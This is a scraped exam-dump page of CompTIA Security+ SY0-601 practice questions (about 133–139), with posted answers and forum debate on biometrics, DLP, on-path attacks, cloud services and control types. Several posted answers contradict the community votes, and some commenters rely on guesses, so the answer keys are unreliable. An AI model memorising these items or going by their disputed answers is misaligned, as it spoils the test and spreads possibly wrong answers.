of adequate control, or even a lack of documentation showing that
personnel maintained adequate control. However, the chain of
custody provides proof that personnel handled the evidence
properly."
Darril Gibson's book
upvoted 3 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: B
Anything to do with the Court and one of the answers says "Chain of custody" logically go for that as the answer as those are the key words you
need to look out for, unless all the answers are to do with the chain of custody then i would go for A which checks the file integrity.
upvoted 2 times

  Orean 3 months ago


Selected Answer: B
This is incredibly vague, but B is the only plausible answer.

None of the other options are detailed in the rules of evidence, which are too esoteric for the judge to care about anyway. They may or may not
impact the probative value of the evidence, but they won't render them inadmissible.
upvoted 1 times

  DanteSurman 3 months ago


"A hash is a checksum value placed on evidence to prove the integrity of the evidence."
By
upvoted 2 times

  Strykar 4 months, 1 week ago


It's B. Not A - the judge has nothing to do with checksum run. He doesn't needs to know that. He just follows the chain of custody.
upvoted 5 times

  Bodatiousbob 4 months, 2 weeks ago


Selected Answer: A
Of solution A and B, A seems to be a more serious reason for the judge to dismiss on
upvoted 6 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 225/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  andrizo 3 months, 3 weeks ago


"Hash what? hashbrown?
upvoted 3 times

  03allen 3 months ago


lol, yes, same here.
A would be for the forecis team.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
I think it is A, I quote from my study guide:

Evidence in court cases is typically legally admissible if it is offered to prove the facts of a case and it does not violate the law. To determine if
evidence is admissible, criteria such as the relevance and reliability of the evidence, whether the evidence was obtained legally, and whether the
evidence is authentic, are all applied. Evidence must be the best evidence available, and the process and procedures should stand up to
challenges in court.
In addition to these requirements, admissibility for digital forensics requires that the data be intact and unaltered and have provably remained
unaltered before and during the forensic process.

A lot of talk about alteration of data, hence I think checksum is a better answer
upvoted 6 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 226/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #133 Topic 1

An organization wants to implement a biometric system with the highest likelihood that an unauthorized user will be denied access. Which of the
following should the organization use to compare biometric solutions?

A. FRR

B. Difficulty of use

C. Cost

D. FAR

E. CER

Correct Answer: E

Community vote distribution


D (52%) E (44%) 5%

  stoneface Highly Voted  5 months ago


Selected Answer: E
Crossover Error Rate (CER)—the point at which FRR and FAR meet. The lower the CER, the more efficient and reliable the technology.
Errors are reduced over time by tuning the system. This is typically accomplished by adjusting the sensitivity of the system until CER is reached.
upvoted 25 times

  PraygeForPass 2 weeks, 6 days ago


The reason I like FAR (False acceptance rate) is because the company is more focused on making sure unauthorized users will be denied
access. They aren't too worried about FRR (False rejection rate) as these users will already have access, so they don't need to focus on
comparing both FAR and FRR using CER. That is why I pick D.
upvoted 2 times

  Halaa 4 months, 2 weeks ago


I agree with you .
As the sensitivity of a biometric system increases, FRRs will rise and FARs will drop.
upvoted 2 times

  Danalyst 4 months, 3 weeks ago


Probably right, I chose D. FAR but the question is worded strangely, 'what should they compare against?'' CER would be more useful.
upvoted 4 times

  comeragh Highly Voted  4 months, 4 weeks ago


Selected Answer: D
"with the highest likelihood that an unauthorized user will be denied access" - I would think this is D (False Acceptance Rate).
upvoted 15 times

  Gino_Slim 3 months, 1 week ago


I hope you didn't select this on the exam...
upvoted 1 times

  Mperor 2 months, 3 weeks ago


lo. you funny
upvoted 2 times

  zzzfox 4 months, 3 weeks ago


False Acceptance Rate means the likelihood that an unauthorized used will be accessed(Acceptance)..
upvoted 3 times

  NICKJONRIPPER 2 months, 1 week ago


make this rate close to 0 to achieve the goal.
upvoted 2 times

  Ranaer Most Recent  1 week, 2 days ago


Selected Answer: D
Here we are focused on "the highest likelihood that an unauthorized user will be denied access". Lets tackle this point by point.

A/ FRR - False rejection rate. This is when you are authorized, but the system rejects you. Not relevant.
B/ Difficulty of use - again, not relevant.
C/ Cost - again, not relevant.
D/ False acceptance rate - This is the occurrence when an unauthorized person IS accepted and allowed by the scanner. This is the exact metric
we need to work with to increase the likelyhood of unauthorized users being denied. The lower the FAR, the less likely it is to let in unauthorized

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 227/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

users.
E/ Crossover error rate - This is the correlation between FRR and FAR. It provides the best compromise between security AND convenience.
Since in this question we DO NOT CARE about convenience, this is one of the wrong answers. We ONLY care about denying unauthorized
people.
upvoted 3 times
  madmax1984 1 week, 5 days ago
Selected Answer: D
Answer is D
upvoted 1 times

  sanlibo 2 weeks ago


Selected Answer: E
"Which of the following should the organization use to compare biometric solutions?"

Crossover Error Rate (CER)—the point at which FRR and FAR meet. The lower the
CER, the more efficient and reliable the technology.
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: A
D. FAR

The False Accept Rate (FAR) is the measure of the likelihood that an unauthorized user will be incorrectly granted access to a system. An
organization should choose a biometric system with a low FAR, as this will increase the likelihood that an unauthorized user will be denied
access.

The False Reject Rate (FRR) is the measure of the likelihood that an authorized user will be incorrectly denied access to a system. The Cost is the
price of the biometric system. The Difficulty of use is the ease or difficulty with which a person can use the system. The Crossover Error Rate
(CER) is the point at which the FRR and FAR are equal. An organization should prioritize choosing a system with a low FAR over these other
factors.
upvoted 2 times

  Underdog79198 1 month ago


ChatGPT says D
upvoted 2 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: D
The Crossover Error Rate (CER) describes the point where the False Reject Rate (FRR) and False Accept Rate (FAR) are equal. CER is also known
as the Equal Error Rate (EER). The Crossover Error Rate describes the overall accuracy of a biometric system.
So, it is asked a minimum False Accept Rate (FAR)
upvoted 1 times

  Jimbobilly 1 month, 3 weeks ago


Selected Answer: D
An organization that wants to implement a biometric system with the highest likelihood that an unauthorized user will be denied access should
choose a system with a low FAR.
upvoted 2 times

  okay123 1 month, 3 weeks ago


Selected Answer: E
The oganization wants to COMPARE biometric solutions. CER is "a comparison metric for different biometric devices and technologies; the error
rate at which FAR equals FRR. The lower the CER, the more accurate and reliable the biometric device."
upvoted 2 times

  smudder 1 month, 3 weeks ago


Selected Answer: E
'compare' = crossover error rate
upvoted 2 times

  deeden 2 months ago


Selected Answer: D
The question seem to be concern about false acceptance, no mention of false rejection, or the two being balanced.
upvoted 2 times

  tek7ila 2 months ago


Selected Answer: D
Also agree it should be D (FAR) - it's just that the question is worded strangly....
upvoted 3 times

  Lynx_ 2 months, 1 week ago


Selected Answer: D

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 228/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

False acceptance rate = % of time an unauthorized user is granted access.


If we compare biometric products, then select one with the lowest False Acceptance, we can ensure fewer falsely accepted users. In other words
“the highest likelihood an unauthorized user will be denied”.
upvoted 4 times
  Kalender 2 months, 1 week ago
Actually there is no option with an answer
the answer should be TRR (True Rejection Rate)
But there is no TRR option. Therefore, it can be said that the correct answer is not FAR!! i think so.
upvoted 1 times

  Idkanything 2 months, 1 week ago


MUST not be FAR

False acceptance rate (FAR)


– Likelihood that an unauthorized user will be "accepted"
upvoted 1 times

  FMMIR 2 months, 2 weeks ago


Selected Answer: A
The Crossover Error Rate (CER) describes the point where the False Rejection Rate (FRR) and False Accept Rate (FAR) are equal. CER is also
known as the Equal Error Rate (EER). The Crossover Error Rate describes the overall accuracy of a biometric system.
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


Sorry. I was wrong. The correct answer is D:

The organization should use the False Acceptance Rate (FAR) to compare biometric solutions. The FAR is the likelihood that an unauthorized
user will be granted access to a system when using a biometric authentication method. A biometric system with a low FAR will have a higher
likelihood of denying access to unauthorized users, making it a more secure option for the organization. Other factors such as the False
Rejection Rate (FRR), the cost, and the ease of use may also be important to consider, but the FAR is the most relevant metric for evaluating
the security of a biometric system.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 229/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #134 Topic 1

A company recently experienced a significant data loss when proprietary information was leaked to a competitor. The company took special
precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate
network was not breached, but documents were downloaded from an employee's COPE tablet and passed to the competitor via cloud storage.
Which of the following is the BEST remediation for this data leak?

A. User training

B. CASB

C. MDM

D. DLP

Correct Answer: A

Community vote distribution


D (68%) A (23%) 6%

  stoneface Highly Voted  5 months ago


Selected Answer: D
This would be handled perfectly by a DLP agent installed on those COBE devices.
upvoted 12 times

  Warza Highly Voted  4 months, 3 weeks ago


Selected Answer: A
The first sentence legitimately tells you that they labeled the data properly for DLP and that the email system has no logs of DLP incidents. The
user downloaded it themselves and shared it manually through a cloud provider. This can be remedied with user training.
upvoted 11 times

  Sezz 1 month ago


User Training does not make sense here. Trained user could also send this kind of sensitive or important infos or files by mistake. Cos of this
we have DLP.
upvoted 1 times

  Orean 2 months, 4 weeks ago


Just because they labeled it doesn't mean they're already used in a DLP solution. Top-secret documents were a thing well before the advent
of the Digital Age and were labeled accordingly.

User-training seems implausible because the user seems to be doing this deliberately by sharing it with competitors, meaning they're
probably incorrigible in that regard.
upvoted 6 times

  deeden 4 months, 2 weeks ago


Yeah... not sure how effective DLP is on personally enabled devices, especially when users have access to Yahoo or Gmail.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


its a cope device
upvoted 1 times

  zzzfox 4 months, 3 weeks ago


Disagree, "passed to the competitor" indicate this person could be insider threat, user training wouldn't help at all.
upvoted 15 times

  RonWonkers 4 months, 2 weeks ago


zzzfox has a good point
upvoted 1 times

  Iwannabeabadasshacker Most Recent  23 hours, 48 minutes ago


C for God sake
you all stop following answers and voting the wrong one
cope= mdm not in place
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The best remediation for this data leak would likely be the implementation of a Data Loss Prevention (DLP) system. A DLP system is designed to
prevent the unauthorized sharing of sensitive information by monitoring and controlling the transfer of data across networks. In this case, a DLP

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 230/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

system could have detected the unauthorized download of proprietary information from the employee's COPE tablet and prevented it from being
passed to the competitor via cloud storage. User training and the use of a Cloud Access Security Broker (CASB) could also help to prevent future
data leaks, but a DLP system would be the most effective solution in this scenario.
upvoted 1 times
  deeden 2 months ago
Selected Answer: D
Agree with DLP. I can't see how user training would help. I mean, a document with "CONFIDENTIAL" label somehow inadvertently end up in their
competitor's cloud drive. And so, I suggest MDM for tablets as compensating control, containerization.
upvoted 1 times

  Blueteam 2 months, 2 weeks ago


"documents were downloaded from an employee's COPE tablet".
The MDM was not in place. The answer is C.
DLP is part of MDM management. There is no evidence that user had malintent or did something wrong.
upvoted 3 times

  johnajwer 2 months, 2 weeks ago


Correct Answer: B
The leaked data was passed via Cloud Storage from a COPE tablet. From comptiaCert:

CASBs provide you with visibility into how clients and other network nodes are using cloud services. Some of the functions of a CASB are:

Enable single sign-on authentication and enforce access controls and authorizations from the enterprise network to the cloud provider.
Scan for malware and rogue or non-compliant device access.
Monitor and audit user and resource activity.
Mitigate data exfiltration by preventing access to unauthorized cloud services from managed devices.
upvoted 1 times

  bengy78 2 months, 3 weeks ago


It's DLP. It says the user downloaded the files onto the COPE device. DLP would prevent this, the CASB would not. They could have simply
shared the files over Bluetooth pulled the files via USB directly off the COPE device if DLP wasn't in place.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: DLP (Data Loss Prevention)

The scenario mentions that the data was labeled which would be indicative of DLP being configured, however, but it doesn't mean that it was.
The data could be labeled just for business operations and nothing else. Also, since the question mentioned that data was transferred from an
employee's device and no security breach occurred, then it was likely an insider threat where implementing DLP would have help prevent.

If DLP was actually implemented, then when the employee attempted to transfer the proprietary information to the competitors cloud storage, the
action would be blocked by the DLP policy as it would detect the sensitive information or block based on the labeled data.
upvoted 3 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: D
DLP would be the best solution, also you could use a CASB to specfically target the use of public cloud storage provider services, but I think
here you should go with DLP
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: D
DLP Prevents any user without admin permissions from stealing proprietary information even if they are an authorised user the question suggests
insider threat hence DLP measures needs to be properly implemented :)

correct mua if im wrong.


upvoted 2 times

  kindis 3 months ago


I think DLP is already in place because of the labeled data. The employee downloaded the file and passed it through cloud because there is
CASB does not exist to protect the cloud. DLP solutions do not typically provide the best cloud coverage. CASB solutions do not provide
comprehensive DLP coverage.
I will go for CASB
upvoted 3 times

  blacktaliban 3 months ago


Selected Answer: D
You can train users all day doesn't mean they still want find a way to get information out .

D for me
upvoted 4 times

  ostralo 3 months, 3 weeks ago


Lable - this shows that DLP is already in place.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 231/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

COPE - COPE programs should use containerization tools, such as the Work Profile in Android Enterprise or the Samsung Knox platform, to
maintain a separation between personal and work data and applications.
so, MDM is already there.

Now we can restrict the cloud storage apps using CASB. So I would go for CASB.
upvoted 2 times

  andrizo 3 months, 3 weeks ago


a casb is mainly security though
upvoted 1 times

  Fuzm4n 3 months, 3 weeks ago


Remediation to make sure it doesn't happen again. MDM. Lock down the device. I guess a DLP would be implemented with an MDM.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


i think too many people are overthinking it, just answer what's in the question
upvoted 1 times

  Strykar 4 months, 1 week ago


Selected Answer: D
Insider threat. D is correct
upvoted 2 times

  i_bird 4 months, 2 weeks ago


I think this question is simply asking, how to prevent data loss from insider threat attack

I'm leaning towards DLP, since user training is fruitless if the attack is not an external breach, but a pre-emptive inside attack from a COPE device
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 232/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #135 Topic 1

An attacker was eavesdropping on a user who was shopping online. The attacker was able to spoof the IP address associated with the shopping
site. Later, the user received an email regarding the credit card statement with unusual purchases. Which of the following attacks took place?

A. On-path attack

B. Protocol poisoning

C. Domain hijacking

D. Bluejacking

Correct Answer: A

Community vote distribution


A (92%) 8%

  Josh_Feng Highly Voted  5 months ago


Selected Answer: A
On path attack is often known as man in the middle.
upvoted 6 times

  banditring 5 months ago


I was getting confused as to what an on path attack is
upvoted 2 times

  Boubou480 Most Recent  4 weeks ago


Selected Answer: C
C. Domain hijacking

Domain hijacking refers to the unauthorized acquisition of control over a domain name. In this case, the attacker was able to spoof the IP address
associated with the shopping site, which means they were able to redirect traffic intended for the legitimate website to a different website under
their control. This allowed the attacker to eavesdrop on the user while they were shopping online and potentially steal their credit card
information.

An on-path attack is an attack in which the attacker has control over a network along the path between the sender and the receiver. Protocol
poisoning is a type of attack in which an attacker modifies a protocol message in an attempt to disrupt or subvert normal communication.
Bluejacking is a type of attack in which an attacker sends unsolicited messages to Bluetooth-enabled devices. None of these attacks are directly
related to the scenario described in the question.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: On-path attack

An On-path attack(Man in the Middle) occurs when an attacker place themselves between two devices (often a web browser and a web server)
and intercept or modify communications between the two.

In this question, the attacker was eavesdropping on the connection which means they placed themselves between the user and the shopping
site and intercepted the communication.

The attacker had likely captured credit card information or account information from the site to be able to make the purchases.
upvoted 1 times

  Bogardinc 1 week, 1 day ago


Are you guys forgetting in the question it states "The attacker was able to spoof the IP address associated with the shopping site"
upvoted 1 times

  alayeluwa 3 months, 3 weeks ago


Selected Answer: A
Man in the middle.
upvoted 1 times

  ostralo 3 months, 3 weeks ago


Selected Answer: A
A,

FYI,
Domain hijacking is the act of changing the registration of a domain name without the permission of the original owner, or by abuse of privileges
on domain hosting and domain registrar systems.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 233/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  comeragh 4 months, 4 weeks ago
Selected Answer: A
"Eavesdroppping" - On-Path
upvoted 2 times

  KetReeb 5 months ago


A: On-path (MTM) - attacker was eavesdropping on the communications, spoofed the IP of the shopping site that the victim thought was legit, a
purchase was attempted, credit info intercepted.
upvoted 3 times

Question #136 Topic 1

A company is considering transitioning to the cloud. The company employs individuals from various locations around the world. The company
does not want to increase its on premises infrastructure blueprint and only wants to pay for additional compute power required. Which of the
following solutions would BEST meet the needs of the company?

A. Private cloud

B. Hybrid environment

C. Managed security service provider

D. Hot backup site

Correct Answer: B

Community vote distribution


B (100%)

  RonWonkers Highly Voted  4 months, 2 weeks ago


Selected Answer: B
The company does not want to increase its on premises infrastructure blueprint, it's B.
upvoted 7 times

  Boubou480 Most Recent  4 weeks ago


B. Hybrid environment

A hybrid environment is a cloud computing model that combines on-premises infrastructure with a cloud infrastructure. This type of solution
would allow the company to retain control over some of its infrastructure while also taking advantage of the flexibility and scalability of the cloud.
This would allow the company to pay for additional compute power as needed and avoid the need to increase its on-premises infrastructure.

A private cloud is a cloud infrastructure that is operated solely for a single organization. It is not suitable for a company with employees located
around the world because it does not provide the flexibility and scalability of a public cloud. A managed security service provider is a third-party
that provides security services to an organization. It is not directly related to the company's need to transition to the cloud. A hot backup site is a
backup site that is always active and ready to take over in the event of a disaster. It is not related to the company's need to transition to the
cloud.
upvoted 1 times

  MathDayMan 3 months ago


B it's B.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 234/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #137 Topic 1

After multiple on premises security solutions were migrated to the cloud, the incident response time increased. The analysts are spending a long
time trying to trace information on different cloud consoles and correlating data in different formats. Which of the following can be used to
optimize the incident response time?

A. CASB

B. VPC

C. SWG

D. CMS

Correct Answer: C

Community vote distribution


A (84%) D (16%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
CASB, better may to keep track accross multiple cloud based security solutions > Open to discussion
upvoted 14 times

  zzzfox 4 months, 3 weeks ago


Agree, consider CASB can be deployed on-premised as well as cloud
upvoted 1 times

  mlonz Most Recent  1 week ago


A cloud access security broker (CASB) is a software tool or service deployed between an organizations network and the cloud provider. It
provides security by monitoring traffic and enforcing security policies.

A next generation secure web gateway (SWG) provide proxy service for traffic from clients to Internet sites, such as filtering URLs and scanning
for malware.
upvoted 1 times

  Sandon 1 week, 4 days ago


Selected Answer: D
ChatGPT says the answer is D. Configuration management system
upvoted 1 times

  ExamLSMotor 1 week, 2 days ago


ChatGPT wrong bro
upvoted 3 times

  Sandon 1 week ago


Yes it is
upvoted 1 times

  shover 2 weeks, 6 days ago


As per the Comptia SYO-601 Acronym list : CMS: Content management system, not cloud management system. I'm sure Cloud management
system is a real thing but according to the Sec+ exam objectives CMS is something totally different.
upvoted 2 times

  Kandy357 3 weeks, 3 days ago


Selected Answer: A
Answer should be CASB.
As per CompTIA Sec+ objectives, CMS is a content management system, not a cloud.
CMP term is used for Cloud Management Platforms.
upvoted 4 times

  shover 2 weeks, 6 days ago


Thanks , i was just about to say that when i went to look up the Acronym in the objectives.
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: D
D. CMS

A Cloud Management System (CMS) is a tool that helps to manage and monitor cloud resources. It can be used to optimize incident response

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 235/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

time by providing a centralized platform for viewing and analyzing data from multiple cloud consoles. This can help analysts to more quickly trace
information and correlate data, as they do not have to switch between different consoles and deal with data in different formats.

A Cloud Access Security Broker (CASB) is a security solution that sits between an organization's on-premises infrastructure and the cloud and
helps to secure data in the cloud. A Virtual Private Cloud (VPC) is a virtual network that is dedicated to an organization and isolated from other
virtual networks in the cloud. A Secure Web Gateway (SWG) is a security solution that is used to protect an organization's users from internet-
based threats. None of these solutions are directly related to optimizing incident response time in the way that a CMS is.
upvoted 1 times
  mike47 1 month, 2 weeks ago
Selected Answer: A
CASB vs SWG
CASB is the more optimal solution for multiple on premises security solutions
CASB services are explicitly designed to fit the needs of large enterprises
You can access link and read about it:
https://www.gend.co/blog/casb-or-swg-which-is-best-option-for-your-enterprise
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
To optimize the incident response time, the company could implement a Cloud Management System (CMS). A CMS is a tool that allows an
organization to manage and monitor all of its cloud-based resources and services from a single, centralized platform. This would enable the
analysts to quickly access and correlate data from different cloud consoles and formats, reducing the time and effort required to respond to
security incidents. Other solutions such as a Cloud Access Security Broker (CASB) or a Secure Web Gateway (SWG) could also help to improve
security in the cloud, but a CMS would be the most effective solution for optimizing incident response time in this scenario. A Virtual Private
Cloud (VPC) would not be relevant in this context
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


The difference between a Cloud Access Security Broker (CASB) and a Cloud Management System (CMS) is that a CASB is a security solution
that sits between an organization's on-premises infrastructure and its cloud-based resources and services, while a CMS is a tool that allows
an organization to manage and monitor all of its cloud-based resources and services from a single, centralized platform. A CASB can help to
improve security by enforcing policies and controls on access to cloud-based resources, but it does not directly affect incident response time.
A CMS, on the other hand, can help to optimize incident response time by enabling analysts to quickly access and correlate data from
different cloud consoles and formats. Both solutions can be useful in optimizing security in the cloud, but they have different functions and
capabilities.
upvoted 1 times

  Halaa 4 months, 2 weeks ago


Selected Answer: A
https://www.instreamcorp.com/wp-content/uploads/2018/11/What-is-CASB.jpg
upvoted 2 times

  Halaa 4 months, 2 weeks ago


(Image)
upvoted 1 times

  Halaa 4 months, 2 weeks ago


CASB provides critical security tool that help control , monitoring, compliance management , data security and threat protection that will
optimize incident response time.
upvoted 2 times

  Yuyuyakuza 4 months, 3 weeks ago


C. SWG deploy swg as part of a SASE solution. could based service to insepct traffic and enforce policies without diverting traffic. esentially
unlike CASB which hurts network performance and employee productivity.
upvoted 2 times

  okay123 5 months ago


When choosing between CASB and SWG, users have to weigh the protections offered by each solution and weigh their level of risk to choose
the right solution for them. A CASB solution with a native API integration can provide more granular protection than a simple in-line SWG
solution. In contrast, SWG solutions offer broader protection, providing a safe Internet use solution without some of the granular SaaS
protections that CASB offers.

https://www.checkpoint.com/cyber-hub/network-security/what-is-secure-web-gateway/secure-web-gateway-swg-vs-casb/
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 236/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #138 Topic 1

Which of the following control types would be BEST to use in an accounting department to reduce losses from fraudulent transactions?

A. Recovery

B. Deterrent

C. Corrective

D. Detective

Correct Answer: D

Community vote distribution


D (54%) C (41%) 5%

  okay123 Highly Voted  5 months ago


Detective controls – look for both fraudulent and unintentionally improper transactions after the fact. Examples of detective controls include
reconciliations, variance analyses, physical inventories, audits, and continuous monitoring through data analytics.
upvoted 12 times

  constant380 Most Recent  3 days, 2 hours ago


Selected Answer: C
Ici quand on parle de corrective en quelque sorte le problème est déja détecté. la détection se fait avant la corrective afin que cela ne se
reproduise plus.
upvoted 1 times

  ronniehaang 4 days, 6 hours ago


Selected Answer: D
The BEST control type to use in an accounting department to reduce losses from fraudulent transactions is Detective. Detective controls are
designed to detect and alert on potential security incidents, including fraudulent transactions. They monitor and analyze activities and data, and
provide real-time or near real-time alerts and reports to help identify potential security incidents. Examples of detective controls include auditing,
logging, and monitoring systems, intrusion detection systems (IDS), and security information and event management (SIEM) systems.
upvoted 1 times

  madmax1984 1 week, 5 days ago


Selected Answer: C
Going with C here. Question states to "reduce losses from fraudulent transactions"... meaning issue has already been detected. Corrective
measures needs to be put in place. Detective detects.
upvoted 1 times

  P0wned 3 weeks, 2 days ago


Selected Answer: D
D. Detective controls
Detective controls are designed to identify and report on security incidents, such as fraud or misuse of resources, and are best used to reduce
losses from fraudulent transactions. Examples of detective controls in an accounting department include regular audits, transaction monitoring,
and access logs that track who is making changes to financial records.
upvoted 1 times

  agustio19 3 weeks, 3 days ago


Corrective controls are implemented after detective controls to rectify the problem and (ideally) prevent it from happening again
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: D
D. Detective

Detective controls are used to detect and identify security incidents or deviations from normal behavior. They are used to alert an organization to
a problem so that corrective action can be taken. In an accounting department, detective controls would be the best type of control to use to
reduce losses from fraudulent transactions. For example, an organization might implement detective controls such as monitoring for unusual
patterns of activity or reviewing transaction logs to identify suspicious activity.

Recovery controls are used to restore an organization to a normal state after a security incident or disaster. Deterrent controls are used to
discourage or deter potential attackers from attempting to compromise an organization's security. Corrective controls are used to fix problems
that have been identified by detective controls. None of these control types are directly related to detecting and preventing fraudulent
transactions in the way that detective controls are.
upvoted 1 times

  mike47 1 month, 2 weeks ago


Selected Answer: D

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 237/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Detective controls and Corrective controls are both used in accounting.


This is what makes this question tricky and the answer close.
Detective finds errors as they occur or happen.
Corrective corrects errors after they are found.
To answer this question, you would have to decide which is more important. I would say Detective. As you would want a solution to find the
problem first. Without that, you cannot quickly correct the problem to reduce the loss. I am going with detective.

This link gives further explanation on the difference:


https://signatureanalytics.com/the-three-main-internal-controls-for-accounting-and-how-they-protect-your-assets/
upvoted 3 times
  [Removed] 1 month, 2 weeks ago
Selected Answer: D
D it is…
upvoted 1 times

  mr_reyes 1 month, 2 weeks ago


Selected Answer: D
I may be way off here, but it seems to be talking about transactions that have already occurred. How can you correct a transaction that has
already occurred, it would seem that you can only prevent further by detecting them before they happen.
upvoted 1 times

  viksap 1 month, 2 weeks ago


Selected Answer: D
DETECTIVE
upvoted 3 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The best control type to use in an accounting department to reduce losses from fraudulent transactions would be a deterrent control. This type of
control is designed to discourage employees from engaging in fraudulent behavior by making it clear that such actions will not be tolerated and
will be punished. Other control types, such as corrective controls, are designed to fix problems after they have occurred, while detective controls
are used to identify fraudulent activity after it has happened. Recovery controls, on the other hand, are designed to restore systems or data after
a disaster or other type of interruption.
upvoted 2 times

  EubertT 1 month, 3 weeks ago


Guys,
This should help, after checking all answers here, I did a research for this similar content. Even the diagram on this link shows the true execution,
check it out:
https://fitsmallbusiness.com/what-are-accounting-
controls/#:~:text=Corrective%20accounting%20controls%20are%20directives,resolve%20weaknesses%20in%20accounting%20controls.
upvoted 2 times

  Sanjucbsa 1 month, 4 weeks ago


Selected Answer: C
Detective controls are designed to detect errors or irregularities that may have occurred. Corrective controls are designed to correct errors or
irregularities that have been detected.
upvoted 3 times

  hieptran 2 weeks, 5 days ago


Agreed, based on the context of this question, fraudulent activity has already occurred.
upvoted 1 times

  Idkanything 2 months, 1 week ago


Selected Answer: D
Detective internal controls are commonly used for things such as "fraud prevention", quality control, and legal compliance.
upvoted 4 times

  babyzilla 2 months, 3 weeks ago


Selected Answer: C
Detective might find the gaps in their process to reduce the losses, but corrective will implement those changes to actually work and see a
difference.
upvoted 1 times

  MarkSc 2 months, 4 weeks ago


I believe C, to reduce loss "from" fraudulent transactions. This would seem to imply the losses have already occurred.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 238/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #139 Topic 1

A company is receiving emails with links to phishing sites that look very similar to the company's own website address and content. Which of the
following is the
BEST way for the company to mitigate this attack?

A. Create a honeynet to trap attackers who access the VPN with credentials obtained by phishing.

B. Generate a list of domains similar to the company's own and implement a DNS sinkhole for each.

C. Disable POP and IMAP on all Internet-facing email servers and implement SMTPS.

D. Use an automated tool to flood the phishing websites with fake usernames and passwords.

Correct Answer: B

Community vote distribution


B (100%)

  Josh_Feng Highly Voted  5 months ago


Selected Answer: B
DNS sinkhole prevents users from entering the site if they have a sinkhole for the domain name. So making a list of fake websites domain name
and making a sinkhole will prevent access to these website if a user tried to search for it on accident.
upvoted 7 times

  FMMIR Most Recent  1 month, 3 weeks ago


Selected Answer: B
The best way for the company to mitigate this attack would be to implement a DNS sinkhole for domains similar to the company's own. A DNS
sinkhole is a security measure that redirects traffic from known malicious or fraudulent websites to a safe location. By generating a list of
domains similar to the company's own and setting up a DNS sinkhole for each, the company can prevent employees from accidentally accessing
phishing websites that mimic the company's own domain. Other solutions such as disabling POP and IMAP on email servers, implementing
SMTPS, or using an automated tool to flood phishing websites with fake credentials may also be effective, but a DNS sinkhole would be the most
direct and effective way to prevent employees from accessing the phishing sites. Creating a honeynet would not be relevant in this scenario.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: B
I agree with B
upvoted 3 times

  stoneface 5 months ago


This is a very confusing question -> Im inclining with D, other options will not directly try to reduce the danger associated with the fake sites
upvoted 1 times

  sanlibo 2 weeks ago


revenge of the sith, lets DDOS the fckers
upvoted 2 times

  stoneface 5 months ago


After consideration Im choosing B -> I think the question implies that Typosqueatting is also on the table. So setting an internal DNS sinkhole
that redirects all similar addresses (including the ones being used on the phishing campaign) to nothing will help mitigate this attack
upvoted 3 times

  andrizo 3 months, 3 weeks ago


but boy, wouldnt it be cool to DOS phishing sites
upvoted 3 times

  zzzfox 4 months, 3 weeks ago


not sure flooding fake websites if is even a legal thing to do...
upvoted 5 times

  Gino_Slim 3 months, 1 week ago


That was a very humorous answer choice to me
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 239/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #140 Topic 1

